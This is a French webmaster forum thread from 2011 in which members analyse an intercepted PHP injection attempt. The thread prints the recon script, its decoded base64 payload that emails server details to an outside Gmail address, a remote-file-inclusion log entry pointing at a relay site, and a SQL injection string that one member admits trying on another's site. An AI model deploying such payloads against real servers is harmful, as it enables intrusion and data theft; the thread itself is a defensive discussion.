1. ✅ Apprenez une METHODE qui marche pour votre SEO ! Formation à distance avec Olivier Duffez et Fabien Facériès + aide pour prise en charge du financement
    Rejeter la notice

Tentative de piratage ^^

Discussion dans 'Administration d'un site Web' créé par medium69, 12 Avril 2011.

  1. medium69
    medium69 WRInaute passionné
    Inscrit:
    7 Mai 2005
    Messages:
    1 948
    J'aime reçus:
    3
    Je viens d'intercepter ce code :

    Code:
    function ConvertBytes($number)
    {
            $len = strlen($number);
            if($len < 4)
            {
                    return sprintf("%d b", $number);
            }
            if($len >= 4 && $len <=6)
            {
                    return sprintf("%0.2f Kb", $number/1024);
            }
            if($len >= 7 && $len <=9)
            {
                    return sprintf("%0.2f Mb", $number/1024/1024);
            }
       
            return sprintf("%0.2f Gb", $number/1024/1024/1024);
                               
    }
    
    echo "Rama<br>";
    $un = @php_uname();
    $up = system(uptime);
    $id1 = system(id);
    $pwd1 = @getcwd();
    $sof1 = getenv("SERVER_SOFTWARE");
    $php1 = phpversion();
    $name1 = $_SERVER['SERVER_NAME'];
    $ip1 = gethostbyname($SERVER_ADDR);
    $free1= diskfreespace($pwd1);
    $free = ConvertBytes(diskfreespace($pwd1));
    if (!$free) {$free = 0;}
    $all1= disk_total_space($pwd1);
    $all = ConvertBytes(disk_total_space($pwd1));
    if (!$all) {$all = 0;}
    $used = ConvertBytes($all1-$free1);
    $os = @PHP_OS;
    
    echo "Rama was here ..<br>";
    echo "uname -a: $un<br>";
    echo "os: $os<br>";
    echo "uptime: $up<br>";
    echo "id: $id1<br>";
    echo "pwd: $pwd1<br>";
    echo "php: $php1<br>";
    echo "software: $sof1<br>";
    echo "server-name: $name1<br>";
    echo "server-ip: $ip1<br>";
    echo "free: $free<br>";
    echo "used: $used<br>";
    echo "total: $all<br>";
    eval(base64_decode(" un code à évaluer"));
    exit;
    mon site à diverses protections et je suis tombé là-dessus.
    J'ai compris que le but est d'avoir des infos sur mon serveur et mes id.

    Mais que fait la dernière ligne (eval...) ?
     
  2. Blount
    Blount WRInaute impliqué
    Inscrit:
    18 Novembre 2010
    Messages:
    707
    J'aime reçus:
    0
    Ça sert à évaluer du code source PHP. base64 permet de convertir des données dans un format sépécifique contenant des caractères ASCII seulement.

    Avec un print_r de la sortie de « base64_decode », on obtiens ceci :
    En plus propre :
    PHP:
    <span class="syntaxdefault"><br />if </span><span class="syntaxkeyword">(@</span><span class="syntaxdefault">ini_get</span><span class="syntaxkeyword">(</span><span class="syntaxstring">"safe_mode"</span><span class="syntaxkeyword">)</span><span class="syntaxdefault"> or strtolower</span><span class="syntaxkeyword">(@</span><span class="syntaxdefault">ini_get</span><span class="syntaxkeyword">(</span><span class="syntaxstring">"safe_mode"</span><span class="syntaxkeyword">))</span><span class="syntaxdefault"> </span><span class="syntaxkeyword">==</span><span class="syntaxdefault"> </span><span class="syntaxstring">"on"</span><span class="syntaxkeyword">)</span><span class="syntaxdefault"> </span><span class="syntaxkeyword">{<br /></span><span class="syntaxdefault">    $safemode </span><span class="syntaxkeyword">=</span><span class="syntaxdefault"> </span><span class="syntaxstring">"ON"</span><span class="syntaxkeyword">;<br />}</span><span class="syntaxdefault"> else </span><span class="syntaxkeyword">{<br /></span><span class="syntaxdefault">    $safemode </span><span class="syntaxkeyword">=</span><span class="syntaxdefault"> </span><span class="syntaxstring">"OFF"</span><span class="syntaxkeyword">;<br />}<br /></span><span class="syntaxdefault">$visitor </span><span class="syntaxkeyword">=</span><span class="syntaxdefault"> $_SERVER</span><span class="syntaxkeyword">[</span><span class="syntaxstring">"REMOTE_ADDR"</span><span class="syntaxkeyword">];<br /></span><span class="syntaxdefault">$float </span><span class="syntaxkeyword">=</span><span class="syntaxdefault"> </span><span class="syntaxstring">"From : vurl info <full@info.com>"</span><span class="syntaxkeyword">;<br /></span><span class="syntaxdefault">$aran </span><span class="syntaxkeyword">=</span><span class="syntaxdefault"> exec</span><span class="syntaxkeyword">(</span><span class="syntaxstring">'uname -a;'</span><span class="syntaxkeyword">);<br /></span><span class="syntaxdefault">$web </span><span class="syntaxkeyword">=</span><span class="syntaxdefault"> $_SERVER</span><span class="syntaxkeyword">[</span><span class="syntaxstring">"HTTP_HOST"</span><span class="syntaxkeyword">];<br /></span><span class="syntaxdefault">$inj </span><span class="syntaxkeyword">=</span><span class="syntaxdefault"> $_SERVER</span><span class="syntaxkeyword">[</span><span class="syntaxstring">"REQUEST_URI"</span><span class="syntaxkeyword">];<br /></span><span class="syntaxdefault">$body </span><span class="syntaxkeyword">=</span><span class="syntaxdefault"> </span><span class="syntaxstring">"Bug http://"</span><span class="syntaxkeyword">.</span><span class="syntaxdefault">$web</span><span class="syntaxkeyword">.</span><span class="syntaxdefault">$inj</span><span class="syntaxkeyword">.</span><span class="syntaxstring">"nnSpread Via : "</span><span class="syntaxkeyword">.</span><span class="syntaxdefault">$visitor</span><span class="syntaxkeyword">.</span><span class="syntaxstring">"nnKernel Version : "</span><span class="syntaxkeyword">.<br /></span><span class="syntaxdefault">            $aran</span><span class="syntaxkeyword">.</span><span class="syntaxstring">"nnSafe Mode : "</span><span class="syntaxkeyword">.</span><span class="syntaxdefault">$safemode</span><span class="syntaxkeyword">;<br /></span><span class="syntaxdefault">mail</span><span class="syntaxkeyword">(</span><span class="syntaxstring">"unixon2010@gmail.com"</span><span class="syntaxkeyword">,</span><span class="syntaxstring">"Setoran Bos "</span><span class="syntaxkeyword">.</span><span class="syntaxdefault">$safemode</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$body</span><span class="syntaxkeyword">,</span><span class="syntaxdefault">$float</span><span class="syntaxkeyword">);<br /></span><span class="syntaxdefault"> </span>
     
  3. medium69
    medium69 WRInaute passionné
    Inscrit:
    7 Mai 2005
    Messages:
    1 948
    J'aime reçus:
    3
    Si j'ai bien compris, si le code qu'il a essayé d'injecter avait été produit, il aurait reçu un e-mail avec diverses informations sur moi ?

    J'ai testé le bout de code sans la dernière partie, et c'est vrai que l'on y trouve des infos intéressante :mrgreen:

    Cela dit, moi aussi j'ai pu glaner quelques infos sur lui. Certes, pas grand chose, mais ça aide ^^

    Code:
        * Code erreur internet :
        * Date et heure d'accès : 12/04/11 à 11:07:39
        * Url demandée : /?page=http://wt-kerber.at/r.txt??
        * Provenance : http://www.science-et-vie.net/
        * Navigateur utilisé : Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)
        * Méthode utilisée : GET
        * Chaine de requête : page=http://wt-kerber.at/r.txt??
        * Nom de Domaine : 212.234.218.194
        * IP du visiteur : 212.234.218.194
    
    quant au site kerber ; il aurait été piraté lui aussi et il s'en servirait pour tenter d'injecter son code ?
     
  4. Zecat
    Zecat WRInaute accro
    Inscrit:
    1 Mars 2005
    Messages:
    9 176
    J'aime reçus:
    0
    un petit signalement a google ?

    mail("unixon2010@gmail.com","Setoran Bos ".$safemode,$body,$float);

    :roll:
     
  5. mitchum
    mitchum WRInaute discret
    Inscrit:
    18 Février 2004
    Messages:
    249
    J'aime reçus:
    0
    un truc "drole" c'est quand tu trace l'ip....

    Code:
    IP address: 	212.234.218.194
    IP country code: 	FR
    IP address country: 	ip address flag France
    IP address state: 	Ile-de-France
    IP address city: 	Maisons-alfort
    IP address latitude: 	48.8000
    IP address longitude: 	2.4333
    ISP of this IP : 	France Telecom
    Organization: 	MINISTERE de L'INTERIEUR
    Local time in France: 	2011-04-12 12:01
     
     
  6. JanoLapin
    JanoLapin WRInaute accro
    Inscrit:
    21 Septembre 2008
    Messages:
    4 250
    J'aime reçus:
    0
    c'est pas sur que ce soit utile, d'après le Whois, le site appartient à une fiduciaire. C'est quand même une profession très encadrée, et je ne les vois pas jouer à ce genre de jeu...

    Peut-être est-ce simplement leur propre site qui a été piraté et sert de relais, comme tu le suggérais...

    Prendre contact avec eux n'est donc pas forcémment une mauvaise chose, non ?
     
  7. medium69
    medium69 WRInaute passionné
    Inscrit:
    7 Mai 2005
    Messages:
    1 948
    J'aime reçus:
    3
    Je n'y avais pas pensé...

    Comme je peux faire ce signalement ?
    Quoi qu'il s'agit probablement d'une adresse relais.

    Au fait... Je l'ai inscrit d'office a ma newsletter ; ainsi, il aura des infos sur mon site tous les mois :mrgreen:
     
  8. medium69
    medium69 WRInaute passionné
    Inscrit:
    7 Mai 2005
    Messages:
    1 948
    J'aime reçus:
    3
    C'est un site allemand il me semble et si je ne suis pas pote avec shékispire... je le suis pas plus avec son pote dont j'ai perdu le nom :wink:

    Cela dit, c'est exactement la réflexion que je me suis faite. Il sert de relais, c'est évident.
     
  9. Leonick
    Leonick WRInaute accro
    Inscrit:
    8 Août 2004
    Messages:
    19 414
    J'aime reçus:
    0
    il sert à quoi ce mail ?
     
  10. bee_human
    bee_human WRInaute passionné
    Inscrit:
    16 Juin 2005
    Messages:
    1 746
    J'aime reçus:
    0
    ça doit être gueute...
     
  11. medium69
    medium69 WRInaute passionné
    Inscrit:
    7 Mai 2005
    Messages:
    1 948
    J'aime reçus:
    3
    A recevoir les informations qu'il aurait pu obtenir sur le site, le serveur, l'identifiant, etc.
     
  12. medium69
    medium69 WRInaute passionné
    Inscrit:
    7 Mai 2005
    Messages:
    1 948
    J'aime reçus:
    3
    Ah moins que cela ne soit sa copine : Gueuze :mrgreen:
     
  13. Dolph
    Dolph WRInaute impliqué
    Inscrit:
    1 Mars 2011
    Messages:
    556
    J'aime reçus:
    0
    Moi, j'ai une question qu'on a pas posé... :)

    Comment tu l'as intercepté ce code ?
     
  14. medium69
    medium69 WRInaute passionné
    Inscrit:
    7 Mai 2005
    Messages:
    1 948
    J'aime reçus:
    3
    Juste un début de piste :

    Code:
    if (xxx !== TRUE || (isset($_SERVER['HTTP_REFERER']) && ($_SERVER['HTTP_REFERER'] != 'http://www.science-et-vie.net' && strpos($_SERVER['QUERY_STRING'], '=http')))) {
    	require($_SERVER['DOCUMENT_ROOT'].'/xxx/anti-hacking.php');	
    	exit;
    }
    Mais je t'en dirais pas plus ;)
     
  15. JanoLapin
    JanoLapin WRInaute accro
    Inscrit:
    21 Septembre 2008
    Messages:
    4 250
    J'aime reçus:
    0
    C'est un site autrichien, et non pas allemand (pas confondre: <troll>nom d'un Belge ! :mrgreen: </troll>

    Leur site est en pur html (avec 1 JS pour l'imprimer (sisi ça existe encore). Ils sont une dizaine de personne et apparemment sans informaticien...
    Bref, ils ne sont sont probablement pas au courant de la présence de ce fichier sur leur serveur (fichier extension txt, qui plus est).

    Si tu veux me faire parvenir par MP un texte de un mail d'avertissement (court) à leur intention, je peux te le traduire.
    Nb: pas compliqué, parce qu'il que je le comprenne
    NBB: pas compliqué, parce qu'il faut qu'ils le comprennent
    NBBB pas TROP compliqué, parce qu'ilf aut que je le leur fasse comprendre ...
     
  16. forty
    forty WRInaute passionné
    Inscrit:
    30 Octobre 2008
    Messages:
    1 929
    J'aime reçus:
    0
    si tu surveilles les erreurs 404 et les paramètres d'url non prévus tu t’aperçois que ce genre de truc arrive tout le temps. Si tu commences à les gérer un par un tu n'as pas fini ;)

    Le test du referer c'est pas top car beaucoup mettent comme referer la page qu'ils tentent d'appeler sur ton site.
     
  17. Zecat
    Zecat WRInaute accro
    Inscrit:
    1 Mars 2005
    Messages:
    9 176
    J'aime reçus:
    0
    tiens forty, des fois que ca te cause.

    J'ai eu droit a ca (dans un champs pseudo dans un formulaire de connexion) :

    \\0\' OR 1 = 1

    (c'est passé par un strip_tags et j'ai pas eu le reflexe de conserver dans un coin le "avant" strip_tags ...)

    Ca t inspire quoi ?
     
  18. forty
    forty WRInaute passionné
    Inscrit:
    30 Octobre 2008
    Messages:
    1 929
    J'aime reçus:
    0
    Ca m'inspire que tu risques d'avoir "SELECT * FROM table_user WHERE pseudo = '\\0\' OR 1 = 1" qui va retourner le premier enregistrement trouvé dans la table puisque la condition "1 = 1" sera toujours vraie

    edit : ce genre de truc ne marche que si tu ne remplaces pas les ' par \' avant de construire le SELECT
     
  19. techron
    techron WRInaute occasionnel
    Inscrit:
    13 Juin 2005
    Messages:
    478
    J'aime reçus:
    0
    Mon antivirus (Avira) me signale un malware en tant que visiteur de ce sujet de discussion:

    Malware found.

    Connecté, il n'y a plus de problèmes.
     
  20. Zecat
    Zecat WRInaute accro
    Inscrit:
    1 Mars 2005
    Messages:
    9 176
    J'aime reçus:
    0
    bon ben alors ca va ... aucune chance que ca produise le moindre effet vu comment j'ai goupillé mon bigniou :mrgreen: Je vais quand même resserer le filtrage sur ce champs ...
     
  21. Leonick
    Leonick WRInaute accro
    Inscrit:
    8 Août 2004
    Messages:
    19 414
    J'aime reçus:
    0
    ça doit venir d'une pub qui s'affiche aux non connectés. Il faudrait que tu indiques à Olivier de quelle pub ça provient. Ca n'est pas la première fois que ça arrive
     
  22. Blount
    Blount WRInaute impliqué
    Inscrit:
    18 Novembre 2010
    Messages:
    707
    J'aime reçus:
    0
    J'ai un peu honte de le dire, mais c'est moi qui ait fait le test :D
    Normalement, tu as du en avoir d'autre avant.
    C'était pour voir si tu avait bien protégé tes données.

    Le \0 signifie une fin de chaîne de caractères en C, ce qui peu provoquer des problèmes dans certain programme.
    En fait, le code que tu as eu ne sert à rien, c'était juste pour tester quelque chose, comme j'étais sur ton site… En tout cas, le principe, c'est de faire une injection SQL. Mais si tu protèges avec la bonne fonction (pas avec addslashes par exemple), tu n'as rien à craindre.

    Désolé :)

    PS : d'ailleurs, le « \ » devant la quote, c'est pas très pratique quand tu reviens sur le formulaire. Tu devrais restituer la valeur exacte.
     
  23. Marie-Aude
    Marie-Aude WRInaute accro
    Inscrit:
    5 Juin 2006
    Messages:
    16 368
    J'aime reçus:
    2
    Je l'avais en connecté... cela provenait semble t il du code du premier message ^^
     
  24. techron
    techron WRInaute occasionnel
    Inscrit:
    13 Juin 2005
    Messages:
    478
    J'aime reçus:
    0
    Mon anti-virus lève encore la main.
     
  25. Zecat
    Zecat WRInaute accro
    Inscrit:
    1 Mars 2005
    Messages:
    9 176
    J'aime reçus:
    0
    Oui j'ai bien vu passer tes 4 tentatives ... IP et numero de user Google (cookie utma) mémorisé dans un journal spécial ! :mrgreen:

    En plus la j'ai d'autant moins a craindre une injection sql que avant d'aller faire open sql ... je vais vérifier ds trucs à partir de .txt ... (reliquat de mon époque sans mysql ... et finalement j'ai adopté ce principe sur les opérations sensibles (les entrées par formulaires) de garder cette redondance ... et la tu t'es fais jeté sans même que j'aille voir dans la base mysql ... :wink: T'as pas franchi le premier rideau :wink:
     
  26. nza2k
    nza2k WRInaute impliqué
    Inscrit:
    16 Janvier 2004
    Messages:
    898
    J'aime reçus:
    2
    +1, c'est également mon interprétation :)
     
  27. rottman
    rottman WRInaute passionné
    Inscrit:
    6 Janvier 2004
    Messages:
    1 810
    J'aime reçus:
    0
Chargement...
Similar Threads - Tentative piratage Forum Date
comment interdire les tentatives de piratage et les spam avec .htacces URL Rewriting et .htaccess 14 Décembre 2009
Blocage IP selon tentatives d'URL URL Rewriting et .htaccess 21 Décembre 2016
Conseil pour seconde tentative de sortie de pénalité Référencement Google 19 Juillet 2016
Tentative d'intrusion sous wordpress Administration d'un site Web 27 Octobre 2015
Tentative de hack ? un aide svp ! Administration d'un site Web 5 Juin 2012
Tentative de hack ? un aide svp ! Développement d'un site Web ou d'une appli mobile 5 Juin 2012
Echec navrant du référencement après plusieurs tentatives d'amélioration Débuter en référencement 19 Janvier 2011
tentative de hacking ou pas ? Administration d'un site Web 10 Janvier 2011
Tentatives d'arnaques Droit du web (juridique, fiscalité...) 11 Octobre 2010
Url ressemblant à une tentative de hack Développement d'un site Web ou d'une appli mobile 21 Septembre 2010